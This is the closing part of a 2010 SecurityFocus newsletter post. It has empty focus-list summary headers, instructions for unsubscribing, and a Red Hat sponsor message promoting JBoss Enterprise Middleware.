VIII. SUN FOCUS LIST SUMMARY
----------------------------
IX. LINUX FOCUS LIST SUMMARY
----------------------------
X. UNSUBSCRIBE INSTRUCTIONS
-----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.

If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and ask to be manually removed.

XI. SPONSOR INFORMATION
------------------------
This issue is sponsored by Red Hat

Putting open source to the test:The making of JBoss Enterprise Middleware

Through a rigorous productization process, JBoss Enterprise Middleware teams continually harden and transform cutting-edge open source technology into well-tempered enterprise software products with unsurpassed quality, performance, and stability - then deliver it with top-notch support and mission-critical SLAs. Here's how it's done.

http://dinclinx.com/Redirect.aspx?36;4756;20;189;0;1;259;ac28cb88c17443b
5

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus